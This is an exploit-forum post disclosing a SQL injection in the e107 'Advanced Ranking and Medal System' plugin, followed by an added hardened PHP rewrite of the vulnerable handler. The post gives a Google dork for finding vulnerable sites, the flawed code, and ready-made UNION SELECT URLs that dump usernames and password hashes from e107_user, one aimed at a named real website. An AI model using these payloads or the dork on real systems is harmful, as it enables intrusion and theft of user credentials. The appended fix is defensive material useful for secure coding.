
02.05.2010, 20:21
Advanced Ranking and Medal System v1.5 by MikeNL
21:44 31-Jan-10
download
SQL inj
Google: inurl:e107_plugins/advmedsys
[path]/e107_plugins/advmedsys/advmedsys_view.php
PHP code:
```php
...require_once("../../class2.php");
require_once(HEADERF);
//-----------------------------------------------------------------------------------------------------------+
//-----------------------------------------------------------------------------------------------------------+
if (e_QUERY) {
    // e_QUERY is split on '.'; none of the segments are validated or escaped
    $tmp = explode('.', e_QUERY);
    $action = $tmp[0];
    $sub_action = $tmp[1];
    $id = $tmp[2];
    unset($tmp);
}
$lan_file = e_PLUGIN."advmedsys/languages/".e_LANGUAGE.".php";
require_once(file_exists($lan_file) ? $lan_file : e_PLUGIN."advmedsys/languages/English.php");
//-----------------------------------------------------------------------------------------------------------+
if ($action == "main" || $action == "") {...
```
PHP code:
```php
...if ($action == "det")
{
    $width = "width:100%";
    $text .= "
    <div style='text-align:center'>
    <br><a href='advmedsys_view.php'><center>[ ".AMS_VIEW_S9." ]</center></a><br>
    <table style='".$width."' class='fborder' cellspacing='0' cellpadding='0'>
    <tr>
    <td style='width:80px' class='forumheader3'><center>".AMS_VIEW_S1."</td>
    <td style='width:100%' class='forumheader3'>".AMS_VIEW_S2."</td>
    </tr>";
    // $sub_action (second segment of e_QUERY) goes straight into the WHERE clause
    $sql->db_Select("advmedsys_medals", "*", "WHERE medal_id = $sub_action","");
    $row = $sql->db_Fetch();
    $text .= "
    <tr>
    <td style='width:80px' class='forumheader3'><img src='medalimg/".$row['medal_pic']."' alt = '".AMS_VIEW_S1."'></img></td>
    <td style='width:100%; vertical-align:middle' class='forumheader3'>".$row['medal_name']."</td>
    </tr>
    </table>
    <br></br>...
```
Further down in the code there is a 2nd-order injection.
Result:
http://[host]/[path]/e107_plugins/advmedsys/advmedsys_view.php?det.1 and 0 union select 1,2,3,concat_ws(0x3a,user_loginname,user_password) from e107_user
http://[host]/[path]/e107_plugins/advmedsys/advmedsys_view.php?det.1 and 0 union select 1,concat_ws(0x3a,user_loginname,user_password),3,4 from e107_user limit 0,1
example:
http://www.truescap.com/e107_plugins/advmedsys/advmedsys_view.php?det.1/*! and 0 union select 1,2,3,concat_ws(0x3a,user_loginname,user_password) from e107_user*/
Last edited by Strilo4ka; 02.05.2010 at 21:00.
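The root cause in the snippet above is that the second segment of e_QUERY is interpolated into the WHERE clause as-is. The following is an added example of a hardened version of that request handling; it is not code from the plugin, from MikeNL, or from the post. It assumes the e107 globals used in the original (`e_QUERY`, `$sql->db_Select()`, `$sql->db_Fetch()`, `$text`); the helper names `parse_advmedsys_query` and `load_medal_row` are hypothetical.

```php
<?php
// Added example (not the plugin's own code): validate the e_QUERY segments
// before they reach SQL, and cast the medal id so the query can only ever
// contain a number.

/**
 * Split an e107 e_QUERY string such as "det.1" into its parts and validate them.
 * Returns null when the request does not have the shape the view expects.
 */
function parse_advmedsys_query($query)
{
    $parts      = explode('.', (string) $query);
    $action     = isset($parts[0]) ? $parts[0] : '';
    $sub_action = isset($parts[1]) ? $parts[1] : '';
    $id         = isset($parts[2]) ? $parts[2] : '';

    // Allow-list the actions the view script actually handles.
    if (!in_array($action, array('', 'main', 'det'), true)) {
        return null;
    }
    // For the "det" view the second segment is a medal_id: digits only.
    // Anything else (spaces, keywords, comment markers) is rejected here.
    if ($action === 'det' && !ctype_digit($sub_action)) {
        return null;
    }
    return array('action' => $action, 'sub_action' => $sub_action, 'id' => $id);
}

/**
 * Fetch one medal row by id. The integer cast is a second, independent
 * barrier: even if a caller bypasses parse_advmedsys_query(), the value
 * interpolated into the WHERE clause is a plain integer.
 */
function load_medal_row($sql, $medal_id)
{
    $medal_id = (int) $medal_id;
    if ($medal_id <= 0) {
        return false;
    }
    $sql->db_Select('advmedsys_medals', '*', 'WHERE medal_id = ' . $medal_id, '');
    return $sql->db_Fetch();
}

// Usage as it would sit in advmedsys_view.php (assumes e107's $sql and $text).
if (defined('e_QUERY') && e_QUERY) {
    $q = parse_advmedsys_query(e_QUERY);
    if ($q === null) {
        // Malformed request: refuse it instead of letting it reach the database.
        header('HTTP/1.1 400 Bad Request');
        exit;
    }
    if ($q['action'] === 'det') {
        $row = load_medal_row($sql, $q['sub_action']);
        if ($row) {
            // Stored columns are escaped on output; they are data, not markup.
            $pic  = htmlspecialchars($row['medal_pic'], ENT_QUOTES, 'UTF-8');
            $name = htmlspecialchars($row['medal_name'], ENT_QUOTES, 'UTF-8');
            $text .= "<tr><td><img src='medalimg/" . $pic . "' alt='medal'></td>"
                   . "<td>" . $name . "</td></tr>";
        }
    }
}
```

The two checks are deliberately redundant: `ctype_digit()` rejects the request early with a 400 (which also gives a clean signal in access logs), while the `(int)` cast inside `load_medal_row()` means a future caller that forgets the parser still cannot produce an injectable query.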